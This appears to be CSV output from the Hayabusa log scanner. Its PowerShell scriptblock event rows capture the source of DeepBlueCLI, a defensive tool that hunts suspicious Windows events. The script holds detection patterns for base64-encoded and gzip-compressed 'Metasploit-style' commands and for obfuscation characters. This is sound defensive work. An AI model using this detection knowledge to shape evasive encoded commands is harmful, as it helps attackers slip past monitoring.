18:56:34.470 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match 
""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. 
This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.474 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the 
events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. 
# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.482 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
